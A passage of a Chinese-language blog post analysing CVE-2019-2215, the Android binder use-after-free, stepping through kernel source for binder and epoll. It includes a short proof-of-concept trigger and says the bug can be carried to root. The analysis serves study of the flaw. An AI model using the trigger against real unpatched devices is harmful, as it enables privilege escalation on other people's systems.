CVE-2019-2215

CVE-2019-2215

复现环境:android 10 kernel: Linux localhost 4.14.150+ arch:x86_64架构

exp只适用于x86(主要是在patch addr_limit上) 其他的架构要根据addr_limit在thread_info或是thread_struct的偏移修改.

漏洞简述

CVE-2019-2215是一个谷歌P0团队发现的与binder驱动相关的安卓内核UAF漏洞,配合内核信息泄漏可以实现任意地址读写,进而可以通过权限提升获取一个root权限的shell。

漏洞分析

主要来根据poc来说明漏洞及其触发

// poc.c
 #include  #include  #include #include 
 #define BINDER_THREAD_EXIT 0x40046208ul
 
 int main() {
   
     int fd, epfd;
     struct epoll_event event = {
   .events = EPOLLIN};
 
     fd = open("/dev/binder", O_RDONLY);
     epfd = epoll_create(1000);
     epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
     ioctl(fd, BINDER_THREAD_EXIT, NULL);
     epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
 }

首先是第一句

 fd = open("/dev/binder", O_RDONLY);

具体调用的是binder_open

// drivers/android/binder.c 
static const struct file_operations binder_fops = {
   
     [...]
     .open = binder_open,
     [...]
 };
static int binder_open(struct inode *nodp, struct file *filp)
 {
   
         struct binder_proc *proc;
         [...]
         proc = kzalloc(sizeof(*proc), GFP_KERNEL);
         if (proc == NULL)
                 return -ENOMEM;
         [...]
         filp->private_data = proc;
         [...]
         return 0;
 }

就是malloc了一个binder_proc数据结构,并将将其分配给filep->private_data

下一句 epoll是用来监控文件的

 epfd = epoll_create(1000);

看一下它的调用链

 SYSCALL_DEFINE1(epoll_create, int, size)
 {
   
         if (size <= 0)
                 return -EINVAL;
 
         return sys_epoll_create1(0);
 }

可以看出传递的参数没什么用,之后调用

SYSCALL_DEFINE1(epoll_create1, int, flags)
 {
   
         int error, fd;
         struct eventpoll *ep = NULL;
         struct file *file;
         [...]
         error = ep_alloc(&ep);
         if (error < 0)
                 return error;
         [...]
         file = anon_inode_getfile("[eventpoll]", &eventpoll_fops, ep,
                                  O_RDWR | (flags & O_CLOEXEC));
         [...]
         ep->file = file;
         fd_install(fd, file);
         return fd;
         [...]
         return error;
 }

epoll_create1调用ep_alloc 之后设置ep->file = file 返回文件描述符fd,那重点我们关注ep_alloc

static int ep_alloc(struct eventpoll **pep)
 {
   
         int error;
         struct user_struct *user;
         struct eventpoll *ep;
         [...]
         ep = kzalloc(sizeof(*ep), GFP_KERNEL);
         [...]
         init_waitqueue_head(&ep->wq);
         init_waitqueue_head(&ep->poll_wait);
         INIT_LIST_HEAD(&ep->rdllist);
         ep->rbr = RB_ROOT_CACHED;
         [...]
         *pep = ep;
         return 0;
         [...]
         return error;
 }

因为涉及了较多eventpoll里的参数,对此给出eventpoll的结构来说明这是

struct eventpoll {
   
	/* Protect the access to this structure */
	spinlock_t lock;

	/*
	 * This mutex is used to ensure that files are not removed
	 * while epoll is using them. This is held during the event
	 * collection loop, the file cleanup path, the epoll file exit
	 * code and the ctl operations.
	 */
	struct mutex mtx;

	/* Wait queue used by sys_epoll_wait() */
	wait_queue_head_t wq;

	/* Wait queue used by file->poll() */
	wait_queue_head_t poll_wait;

	/* List of ready file descriptors */
	struct list_head rdllist;

	/* RB tree root used to store monitored fd structs */
	struct rb_root_cached rbr;

	/*
	 * This is a single linked list that chains all the "struct epitem" that
	 * happened while transferring ready events to userspace w/out
	 * holding ->lock.
	 */
	struct epitem *ovflist;

	/* wakeup_source used when ep_scan_ready_list is running */
	struct wakeup_source *ws;

	/* The user that created the eventpoll descriptor */
	struct user_struct *user;

	struct file *file;

	/* used to optimize loop detection check */
	int visited;
	struct list_head visited_list_link;

#ifdef CONFIG_NET_RX_BUSY_POLL
	/* used to track busy poll napi_id */
	unsigned int napi_id;
#endif
};

可以看出在epoll_alloc中 分配struct eventpoll,初始化等待队列 wq和poll_wait成员,初始化rbr成员,该成员是红黑树的根,wq是漏洞触发的关键,在此具体说明是怎么样初始化的

这是wait_queue_head_t的结构

//include/linux/wait.h
 struct __wait_queue_head {
   
	spinlock_t		lock; //这是锁,可以先不管,不过要明白它是4个字节的
	struct list_head	task_list;//是个双向链表
};

// 
struct list_head {
   
	struct list_head *next, *prev;};


这是init_waitqueue_head函数

#define init_waitqueue_head(q)				\
	do {
     						\
		static struct lock_class_key __key;	\
							\
		__init_waitqueue_head((q), #q, &__key);	\
	} while (0)
 
  __init_waitqueue_head(wait_queue_head_t *q, const char *name, struct lock_class_key *key)
{
   	spin_lock_init(&q->lock);
	lockdep_set_class_and_name(&q->lock, key, name);
	INIT_LIST_HEAD(&q->task_list);
}EXPORT_SYMBOL(__init_waitqueue_head);



static inline void INIT_LIST_HEAD(struct list_head *list)
{
   
	list->next = list;
    list->prev = list;
}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AuKgsxMe-1644394151937)(wait.png)]

首尾相连,在内存中表现是这样的,前一个是next,后一个是prev,就是指向它自己

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Kb1PTZRZ-1644394151939)(init_wq.png)]

后面来看下一句

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
                 struct epoll_event __user *, event)
 {
   
         int error;
         int full_check = 0;
         struct fd f, tf;
         struct eventpoll *ep;
         struct epitem *epi;
         struct epoll_event epds;
         struct eventpoll *tep = NULL;
 
         error = -EFAULT;
         if (ep_op_has_event(op) &&
             copy_from_user(&epds, event, sizeof(struct epoll_event)))
                 goto error_return;
 
         error = -EBADF;
         f = fdget(epfd);
         if (!f.file)
                 goto error_return;
 
         /* Get the "struct file *" for the target file */
         tf = fdget(fd);
         if (!tf.file)
                 goto error_fput;
         [...]
         ep = f.file->private_data;
         [...]
         epi = ep_find(ep, tf.file, fd);
 
         error = -EINVAL;
         switch (op) {
   
         case EPOLL_CTL_ADD:
                 if (!epi) {
   
                         epds.events |= POLLERR | POLLHUP;
                         error = ep_insert(ep, &epds, tf.file, fd, full_check);
                 } else
                         error = -EEXIST;
                 [...]
         [...]
         }
         [...]
         return error;
 }

将epoll_event结构从用户空间复制到内核空间

· 查找和文件描述符fd对应的file指针epfd

· eventpoll从epoll文件描述符private_data的file指针成员中获取结构的指针epfd

· 调用从存储在与文件描述符匹配的结构中的红黑树节点中ep_find找到指向链接epitem结构的指针eventpoll

· 如果epitem找不到对应的fd,当事件为EPOLL_CTL_ADD则调用ep_insert函数分配并将其链接epitem到eventpoll结构的rbr成员

接着来看一下ep_insert

 static int ep_insert(struct eventpoll *ep, struct epoll_event *event,
                      struct file *tfile, int fd, int full_check)
 {
   
         int error, revents, pwake = 0;
         unsigned long flags;
         long user_watches;
         struct epitem *epi;
         struct ep_pqueue epq;
         [...]
         if (!(epi = kmem_cache_alloc(epi_cache, GFP_KERNEL)))
                 return -ENOMEM;
 
         /* Item initialization follow here ... */
         INIT_LIST_HEAD(&epi->rdllink);
         INIT_LIST_HEAD(&epi->fllink);
         INIT_LIST_HEAD(&epi->pwqlist);
         epi->ep = ep;
         ep_set_ffd(&epi->ffd, tfile, fd);
         epi->event = *event;
         [...]
 
         /* Initialize the poll table using the queue callback */
         epq.epi = epi;
         init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);
         [...]
         revents = ep_item_poll(epi, &epq.pt);
         [...]
         ep_rbtree_insert(ep, epi);
         [...]
         return 0;
         [...]
         return error;
 }

· 分配一个临时结构 ep_pqueue

· 分配epitem结构并将其初始化

· 初始化epi->pwqlist用于链接轮询等待队列的成员

· 设置epitem结构成员ffd->file = file,在我们的例子中,ffd->fd = fd它是file通过调用绑定器的结构指针和描述符ep_set_ffd

· 设置epq.epi为epi指针

· 设置epq.pt->_qproc为ep_ptable_queue_proc 回调地址

· 调用ep_item_poll传递epi和epq.pt(轮询表)的地址作为参数

· 最后,通过调用函数epitem将eventpoll结构链接到结构的红黑树根节点ep_rbtree_insert

让我们跟随ep_item_poll并找出它的作用。

 static inline unsigned int ep_item_poll(struct epitem *epi, poll_table *pt)
 {
   
         pt->_key = epi->event.events;
 
         return epi->ffd.file->f_op->poll(epi->ffd.file, pt) & epi->event.events;
 }

这个就是调用binder_poll函数,在内存表现是这样的

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

接着查看binder_poll

 static unsigned int binder_poll(struct file *filp,
                                 struct poll_table_struct *wait)
 {
   
         struct binder_proc *proc = filp->private_data;
         struct binder_thread *thread = NULL;
         [...]
         thread = binder_get_thread(proc);
         if (!thread)
                 return POLLERR;
         [...]
         poll_wait(filp, &thread->wait, wait);
         [...]
         return 0;
 }

· 获取指向binder_proc结构的指针filp->private_data

· 调用binder_get_thread传递binder_proc结构的指针

· 最后调用poll_wait传递联编程序的file结构指针,&thread->wait即wait_queue_head_t指针和poll_table_struct指针

在其中binder_get_thread和 poll_wait是关键,我们先看一下binder_get_thread

 static struct binder_thread *binder_get_thread(struct binder_proc *proc)
 {
   
         struct binder_thread *thread;
         struct binder_thread *new_thread;
         [...]
         thread = binder_get_thread_ilocked(proc, NULL);
         [...]
         if (!thread) {
   
                 new_thread = kzalloc(sizeof(*thread), GFP_KERNEL);
                 [...]
                 thread = binder_get_thread_ilocked(proc, new_thread);
                 [...]
         }
         return thread;
 }

· 尝试通过调用获取binder_threadifproc->threads.rb_node``binder_get_thread_ilocked

· 否则它分配一个binder_thread结构

· 最后binder_get_thread_ilocked再次调用,这将初始化新分配的binder_thread结构并将其链接到proc->threads.rb_node基本上是红黑树节点的成员

struct binder_thread {
   
	struct binder_proc *proc;
	struct rb_node rb_node;
	struct list_head waiting_thread_node;
	int pid;
	int looper;              /* only modified by this thread */
	bool looper_need_return; /* can be written by other thread */
	struct binder_transaction *transaction_stack;
	struct list_head todo;
	bool process_todo;
	struct binder_error return_error;
	struct binder_error reply_error;
	wait_queue_head_t wait; //wait的初始化和epoll->wait是一样的 uaf的触发点 
	struct binder_stats stats;
	atomic_t tmp_ref;
	bool is_dead;
	struct task_struct *task;//exp利用的重点
};

在这里插入图片描述

对于poll_wait 它实际上调用的是ep_insert中初始化的ep_ptable_queue_proc,这里是uaf的第2个关键步骤

 static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,
                  poll_table *pt)
 {
   
     struct epitem *epi = ep_item_from_epqueue(pt);
     struct eppoll_entry 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值